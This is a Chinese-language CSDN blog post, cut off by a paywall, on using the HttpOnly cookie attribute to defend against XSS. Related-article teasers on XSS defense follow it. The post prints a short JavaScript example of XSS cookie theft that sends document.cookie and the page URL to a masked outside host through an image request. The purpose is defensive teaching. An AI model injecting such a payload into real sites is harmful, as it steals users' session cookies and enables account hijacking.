利用HttpOnly来防御xss攻击

最新推荐文章于 2024-12-03 22:02:12 发布

风火程序员

最新推荐文章于 2024-12-03 22:02:12 发布

阅读量3k

点赞数 1

分类专栏： php 文章标签： HttpOnly phpxss xss

本文链接：https://blog.csdn.net/phpfenghuo/article/details/26161161

版权

本文探讨了XSS攻击的危害，特别是在允许攻击者通过JavaScript获取敏感cookie时。介绍如何利用HttpOnly属性来防御这种攻击，保护用户的会话安全。

摘要由CSDN通过智能技术生成

xss的概念就不用多说了，它的危害是极大的，这就意味着一旦你的网站出现xss漏洞，就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持，如果这里面包含了大量敏感信息（身份信息，管理员信息）等，那完了。。。

如下js获取cookie信息：

    　url=document.top.location.href;
    　cookie=document.cookie;
    　c=new Image();
    　c.src=’http://www.******.com/c.php?c=’+cookie+’&u=’+url;

一般cookie都是从document对象中获取的，现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数，跟domain等其他参数一样，一旦这个HttpOnly被设置，你在浏览器的document对象中就看不到Cookie了。
PHP设置HttpOnly：

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

风火程序员

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【网络安全】XSS之HTTP Only

等风来

05-29

1482

HTTP Only 是一个用于设置 HTTP Cookie 的属性，它可以防止通过 JavaScript 访问该 Cookie。当将 Cookie 标记为 HTTP Only 后，浏览器将只允许在 HTTP 请求中发送该 Cookie，而禁止在客户端的 JavaScript 中进行访问。

浅谈如何防御xss攻击

xj28555的博客

07-23

568

笔前闲聊最近都在写一些防守型文章，是因为笔者在最近的学习当中发现一些当初以攻击者角度学习的知识在某些特殊的场合下会表现的有点不够全面，总是感觉某些知识点联系不在一起，所以最近总是写一些防御型文章来把一些知识加强理解，在脑子里形成自己的知识脑图。认识xss 首先还是来了解什么是xss，师傅们对这个东西估计也挺熟的啦，我就直接上百度了。 XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页...

参与评论您还未登录，请先登录后发表或查看评论

跨站脚本攻击（XSS）：为什么Cookie中有HttpOnly属性？

小王的技术库

11-08

1476

XSS 全称是 Cross Site Scripting，为了与“CSS”区分开来，故简称 XSS，翻译过来就是“跨站脚本”。XSS 攻击是指黑客往 HTML 文件中或者 DOM 中注入恶意脚本，从而在用户浏览页面时利用注入的恶意脚本对用户实施攻击的一种手段。最开始的时候，这种攻击是通过跨域来实现的，所以叫“跨域脚本”。但是发展到现在，往 HTML 文件中注入恶意代码的方式越来越多了，所以是否跨域注入脚本已经不是唯一的注入手段了，但是 XSS 这个名字却一直保留至今。

Nginx设置HttpOnly Secure SameSite参数解决Cookie信息丢失

最新发布

m0_74825152的博客

12-03

514

当然，前提是用户浏览器支持 SameSite 属性。不过，前提是必须同时设置Secure属性（Cookie 只能通过 HTTPS 协议发送），否则无效。浏览器F12 在网络下查看当前状态，SameSite属性缺失，我们需要通过配置nginx将SameSite属性设置为Strict或者 Lax。在Cookie中设置了“HttpOnly”属性，通过程序(JS脚本、Applet等)将无法读取到Cookie信息。安全性，指定Cookie是否只能通过https协议访问，一般的Cookie使用HTTP协议既可访问。

利用HTTP-only Cookie缓解XSS之痛

ellis2008的专栏

03-11

1040

<br /> 利用HTTP-only Cookie缓解XSS之痛<br /> 在Web安全领域，跨站脚本攻击时最为常见的一种攻击形式，也是长久以来的一个老大难问题，而本文将向读者介绍的是一种用以缓解这种压力的技术，即HTTP-only cookie。 <br />我们首先对HTTP-only cookie和跨站脚本攻击做了简单的解释，然后详细说明了如何利用HTTP-only cookie来保护敏感数据，最后介绍了实现HTTP-only cookie时确定浏览器版本的具体问题。<br />一、XSS与HTT

HTTP Only下的XSS攻击

永远是少年

11-23

1487

网络：XSS和HttpOnly

五山口老法师

03-28

1353

1.什么是HttpOnly? 如果cookie中设置了HttpOnly属性，那么通过js脚本将无法读取到cookie信息，这样能有效的防止XSS攻击，窃取cookie内容，这样就增加了cookie的安全性，即便是这样，也不要将重要信息存入cookie。XSS全称Cross SiteScript，跨站脚本攻击，是Web程序中常见的漏洞，XSS属于被动式且用于客户端的攻击方式，所以容易被忽略其危害性...

【第55课】XSS防御&HttpOnly&CSP&靶场工具等

Lucker_YYY的博客

08-22

1102

免责声明本文发布的工具和脚本，仅用作测试和学习研究，禁止用于商业用途，不能保证其合法性，准确性，完整性和有效性，请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利，则应及时通知并提供身份证明，所有权证明，我们将在收到认证文件后删除相关内容。文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用，任何人不得将其应用于非法用途及盈利等目的，间接使用文章中的任何工具、思路及技术，我方对于由此引起的法律后果概不负责。

xss防御之php利用httponly防xss攻击

10-26

例如，反射型XSS和DOM型XSS攻击往往不依赖于Cookie，因此除了使用HttpOnly之外，还需要通过其他安全措施来全面防御XSS攻击，比如内容安全策略（CSP）、输入验证、输出编码等。此外，由于Web浏览器和服务器实现的差异...

8、XSS 攻击的防御pdf资料

10-15

为了防御XSS攻击，开发者需要采取一系列措施，包括但不限于： - 对用户输入进行严格的过滤和转义，确保任何可能包含恶意脚本的数据在显示之前都被安全处理。 - 使用HTTP头部的Content-Security-Policy（CSP）来限制...

WEB安全-XSS

qq_32350719的博客

03-02

430

一、XSS概述 XSS全称Cross Site Script，跨站脚本攻击。通常指攻击者通过“HTML注入”篡改网页，插入恶意脚本，从而在用户浏览网页时，控制用户浏览器的一种攻击手段。到底什么是XSS呢？我们直接来看一个例子。我们先写一个前端页面，要求用户输入用户名，并传给后端处理：后端处理页面，网页将接收到的用户名直接输出到页面上：访问前端页面，输入用户名Monster：点击...

java安全（二） --自编写字符串过滤-(防XSS攻击)

LuckyToMeet-Dian叶

11-13

2011

前言：最近项目中遇到很无语的XSS攻击问题，网上也有很多解决方案，一般也有用httponly来防止XSS拿到cookie的。没办法，前端输入的数据都是不可信的数据，需要对传入后端的数据做处理，针对数据过滤，本着造轮子的原则，我写了一套过滤规则。可以过滤常见的XSS脚本。当然，如果想要完善的，可以使用springboot提供的XSS过滤。简单一点上代码： pack...

XSS跨站脚本攻击在Java开发中防范的方法

weixin_30914981的博客

02-26

191

1. 防堵跨站漏洞，阻止攻击者利用在被攻击网站上发布跨站攻击语句不可以信任用户提交的任何内容，首先代码里对用户输入的地方和变量都需要仔细检查长度和对”<”,”>”,”;”,”’”等字符做过滤；其次任何内容写到页面之前都必须加以encode，避免不小心把html tag 弄出来。这一个层面做好，至少可以堵住超过一半的XSS 攻击。 2. Cookie 防盗首先避免直接在cookie...

全局存储型XSS漏洞修复

大白菜鸟的博客

12-23

2646

什么是XSS？人们经常将跨站脚本攻击（Cross Site Scripting）缩写为CSS，但这会与层叠样式表（Cascading Style Sheets，CSS）的缩写混淆。因此，有人将跨站脚本攻击缩写为XSS。跨站脚本攻击（XSS），是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中，当正常用户访问该页面时，则可导致嵌入的恶意脚本代码的执...

如何将cookie中httponly属性设置为true？（预防XSS攻击）

刘桂香263的博客

06-08

6459

在 cookie 中设置了 HttpOnly 属性，那么通过 js 脚本将无法读取到cookie 信息，这样能有效的防止 XSS 攻击。

HttpOnly 标志——保护 Cookie 免受 XSS

allway2的博客

08-02

3285

然而，在日常使用中，Web应用程序很少需要通过JavaScript访问cookie。因此，设计了一种保护cookie免受此类盗窃的方法一个标志，告诉Web浏览器cookie只能通过HTTP访问-如果设置了这个cookie，如果连接是HTTP，浏览器将永远不会发送cookie。HTTP响应标头的可选属性，由Web服务器在HTTP响应中与网页一起发送到Web浏览器。应发送cookie，具体取决于访问者与设置cookie的站点的交互方式。...

浅谈Web前端安全策略xss和csrf，及又该如何预防？

dzqxwzoe的博客

02-09

499

跨站脚本攻击，缩写为XSS(Cross Site Scripting)，是利用网页的漏洞，通过某种方式给网页注入恶意代码，使用户加载网页时执行注入的恶意代码。跨站请求伪造(Cross-site request forgery)，也被称为或者 session riding，通常缩写为CSRF或者XSRF，是一种挟制用户在当前已登录的Web应用程序上执行**非本意的操作**的攻击方法。如：攻击者诱导受害者进入第三方网站，在第三方网站中，向被攻击网站发送跨站请求。

全面防御XSS攻击：策略与方法

- Cookie属性设置：通过设置HttpOnly属性，使得Cookie在浏览器端无法通过脚本访问，从而降低XSS攻击窃取Cookie的风险。 - 使用XSS过滤器：在Web应用中集成XSS过滤模块，自动检测和过滤输入输出中的潜在XSS攻击代码...